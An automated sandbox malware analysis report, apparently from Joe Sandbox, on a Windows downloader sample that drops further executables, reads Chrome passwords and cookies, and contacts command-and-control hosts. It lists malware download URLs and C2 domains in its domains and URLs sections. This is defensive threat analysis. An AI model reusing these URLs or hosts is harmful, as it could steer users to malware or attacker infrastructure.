Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -sJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E65FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E65FB78
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E6652CE
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122EEB3 SetUnhandledExceptionFilter,1_2_0122EEB3
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0122F07B
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012384EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_012384EF
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0122ED65
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040825D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,4_2_10015354
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,4_2_10015376
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,4_2_10018413
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000E44D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026EBE0B SetUnhandledExceptionFilter,21_2_026EBE0B
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026EBDF7 SetUnhandledExceptionFilter,21_2_026EBDF7
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E83315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_04E83315
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E86CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_04E86CE8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E88D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_04E88D22
Source: C:\Users\user\Desktop\h1GodtbhC8.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,4_2_1001A0F0
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122EBBB cpuid 1_2_0122EBBB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_0122A5BC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: GetLocaleInfoA,4_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,21_2_026EF2DC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,_strncpy,21_2_026F0636
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,21_2_026F2A70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,EnumSystemLocalesA,21_2_026F0B65
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoW,WideCharToMultiByte,21_2_026F2B23
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,_strlen,EnumSystemLocalesA,21_2_026F0B9C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,21_2_026F2940
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,MultiByteToWideChar,21_2_026F29FC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,21_2_026F0C77
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,EnumSystemLocalesA,21_2_026F0C22
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,_xtoa_s@20,21_2_04E8B5DD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_04E95CD8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,21_2_04E95D79
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_04E95D3D
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,21_2_04E95F69
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,21_2_04E9585F
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,4_2_10019780
Source: C:\Users\user\Desktop\h1GodtbhC8.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E674FB1 GetSystemTimeAsFileTime,0_2_6E674FB1
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E677DBD _free,GetTimeZoneInformation,_free,0_2_6E677DBD
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6294C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,0_2_6E6294C0

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Native API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential Dumping1System Time Discovery12Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsCommand and Scripting Interpreter3Create Account1Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture11Peripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Browser Extensions1Process Injection12Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Bootkit1Logon Script (Mac)Install Root Certificate2NTDSSystem Information Discovery58Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsQuery Registry2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSecurity Software Discovery471VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading2Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion14/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Network Configuration Discovery2Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdBootkit1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 327203 Sample: h1GodtbhC8.exe Startdate: 05/12/2020 Architecture: WINDOWS Score: 100 60 dream.pics 2->60 62 www.sodown.xyz 2->62 64 30 other IPs or domains 2->64 80 Multi AV Scanner detection for domain / URL 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 14 other signatures 2->86 11 h1GodtbhC8.exe 1 26 2->11         started        14 msiexec.exe 2->14         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\Sibuia.dll, PE32 11->52 dropped 54 C:\Users\user\AppData\...\h1GodtbhC8.exe.log, ASCII 11->54 dropped 56 C:\Users\user\AppData\Local\...\SibClr.dll, PE32 11->56 dropped 58 2 other files (none is malicious) 11->58 dropped 16 setup.exe 5 11->16         started        process6 file7 48 C:\Program Files (x86)\...\aliens.exe, PE32 16->48 dropped 19 aliens.exe 1 2 16->19         started        process8 dnsIp9 66 EF6DF4AF06BA6896.xyz 104.28.4.129, 49734, 49738, 49740 CLOUDFLARENETUS United States 19->66 68 ef6df4af06ba6896.xyz 19->68 50 C:\Users\user\...\1E1C360C582DF797.exe, PE32 19->50 dropped 88 Installs new ROOT certificates 19->88 90 Hides threads from debuggers 19->90 24 1E1C360C582DF797.exe 2 29 19->24         started        28 cmd.exe 19->28         started        30 1E1C360C582DF797.exe 1 15 19->30         started        32 msiexec.exe 4 19->32         started        file10 signatures11 process12 dnsIp13 70 1c5491a87d65f1ef.club 172.67.142.39, 443, 49739 CLOUDFLARENETUS United States 24->70 72 192.168.2.1 unknown unknown 24->72 78 2 other IPs or domains 24->78 92 Detected unpacking (creates a PE file in dynamic memory) 24->92 94 Machine Learning detection for dropped file 24->94 96 Tries to harvest and steal browser information (history, passwords, etc) 24->96 98 Contains functionality to detect sleep reduction / modifications 24->98 34 1607186572092.exe 24->34         started        36 1607186588295.exe 24->36         started        38 ThunderFW.exe 24->38         started        74 127.0.0.1 unknown unknown 28->74 100 Uses ping.exe to sleep 28->100 40 conhost.exe 28->40         started        42 PING.EXE 28->42         started        76 ef6df4af06ba6896.xyz 30->76 44 cmd.exe 30->44         started        signatures14 process15 process16 46 conhost.exe 44->46         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
h1GodtbhC8.exe46%VirustotalBrowse
h1GodtbhC8.exe19%MetadefenderBrowse
h1GodtbhC8.exe64%ReversingLabsWin32.Downloader.Upatre
h1GodtbhC8.exe100%AviraHEUR/AGEN.1139239
h1GodtbhC8.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe100%Joe Sandbox ML
C:\Program Files (x86)\71eza90awf48\aliens.exe100%Joe Sandbox ML
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll17%ReversingLabsWin32.PUA.SilentInstallBuilder

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
25.2.1E1C360C582DF797.exe.4330000.4.unpack100%AviraTR/Patched.Ren.Gen2Download File
0.0.h1GodtbhC8.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File
21.2.1E1C360C582DF797.exe.42a0000.6.unpack100%AviraTR/Patched.Ren.Gen2Download File
4.2.aliens.exe.42c0000.4.unpack100%AviraTR/Patched.Ren.Gen2Download File
0.2.h1GodtbhC8.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File

Domains

SourceDetectionScannerLabelLink
ef6df4af06ba6896.xyz5%VirustotalBrowse
dream.pics10%VirustotalBrowse
EF6DF4AF06BA6896.xyz5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://1C5491A87D65F1EF.club/Info_t/upycfa0%Avira URL Cloudsafe
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/info/du0%Avira URL Cloudsafe
http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/00%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/w0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz//0%Avira URL Cloudsafe
http://dream.pics/setup_10.2_mix1.exe0%Avira URL Cloudsafe
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/;0%Avira URL Cloudsafe
https://1C5491A87D65F1EF.club/Info_t/upData0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/du:0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/info/wlub0%Avira URL Cloudsafe
http://dream.pics/setup_10.2_mix1.exeimet0%Avira URL Cloudsafe
http://www.youtube.com_70%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://dream.pics/setup_10.2_mix1.exe6b_x0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/0%Avira URL Cloudsafe
https://.twitter.com/s0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/du.0%Avira URL Cloudsafe
http://crt.com0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/info/ddd0%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/dbo0%Avira URL Cloudsafe
http://www.sodown.xyz/index.exe100%Avira URL Cloudmalware
https://1C5491A87D65F1EF.club/0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://ef6df4af06ba6896.xyz/info/g0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/e0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/info/r0%Avira URL Cloudsafe
https://1C5491A87D65F1EF.club/Info_t/up0%Avira URL Cloudsafe
http://crl.usertrust.0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/info/dddi_u0%Avira URL Cloudsafe
http://ocsp.usertrus0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://www.sodown.xyz/in0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ef6df4af06ba6896.xyz
104.28.4.129
truefalseunknown
cnchubstat.sandai.net
140.206.225.136
truefalse
    		high
    bgphub5u.sandai.net
    		39.98.57.143
    		truefalse
      		high
      iplogger.org
      		88.99.66.31
      		truefalse
        		high
        dream.pics
        		8.208.85.95
        		truetrueunknown
        bgphub5pr.sandai.net
        		47.92.39.6
        		truefalse
          		high
          EF6DF4AF06BA6896.xyz
          		104.28.4.129
          		truefalseunknown
          1c5491a87d65f1ef.club
          		172.67.142.39
          		truefalse
            		unknown
            cnc.hub5pnc.sandai.net
            		47.92.99.221
            		truefalse
              		high
              www.sodown.xyz
              		104.18.63.67
              		truefalse
                		unknown
                cnc.hub5pn.sandai.net
                		153.3.232.174
                		truefalse
                  		high
                  cncidx.m.hub.sandai.net
                  		112.64.218.64
                  		truefalse
                    		high
                    pmap.sandai.net
                    		47.97.7.140
                    		truefalse
                      		high
                      hub5c.hz.sandai.net
                      		unknown
                      		unknownfalse
                        		high
                        hub5idx.shub.hz.sandai.net
                        		unknown
                        		unknownfalse
                          		high
                          hub5u.hz.sandai.net
                          		unknown
                          		unknownfalse
                            		high
                            hub5sr.shub.hz.sandai.net
                            		unknown
                            		unknownfalse
                              		high
                              score.phub.hz.sandai.net
                              		unknown
                              		unknownfalse
                                		high
                                hubstat.hz.sandai.net
                                		unknown
                                		unknownfalse
                                  		high
                                  pmap.hz.sandai.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    hub5pr.hz.sandai.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      hub5pn.hz.sandai.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        imhub5pr.hz.sandai.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          hub5pnc.hz.sandai.net
                                          		unknown
                                          		unknownfalse
                                            		high
                                            relay.phub.hz.sandai.net
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://ef6df4af06ba6896.xyz/info/wfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://EF6DF4AF06BA6896.xyz/info/dddfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ef6df4af06ba6896.xyz/info/dufalse
                                                		unknown
                                                http://ef6df4af06ba6896.xyz/info/gfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ef6df4af06ba6896.xyz/info/efalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ef6df4af06ba6896.xyz/info/rfalse
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://1C5491A87D65F1EF.club/Info_t/upycfa1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/chrome_newtab1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://duckduckgo.com/ac/?q=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://ocsp.sectigo.com0h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://EF6DF4AF06BA6896.xyz/info/du1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.messenger.com/1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://EF6DF4AF06BA6896.xyz/01E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://EF6DF4AF06BA6896.xyz//1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nirsoft.net1607186572092.exe, 0000001C.00000002.546643482.0000000000198000.00000004.00000010.sdmp, 1607186588295.exe, 0000001D.00000002.580802111.0000000000198000.00000004.00000010.sdmpfalse
                                                            		high
                                                            http://EF6DF4AF06BA6896.xyz/info/w1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmpfalse
                                                              		unknown
                                                              http://dream.pics/setup_10.2_mix1.exe1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://nsis.sf.net/NSIS_Error...aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.drfalse
                                                                		high
                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
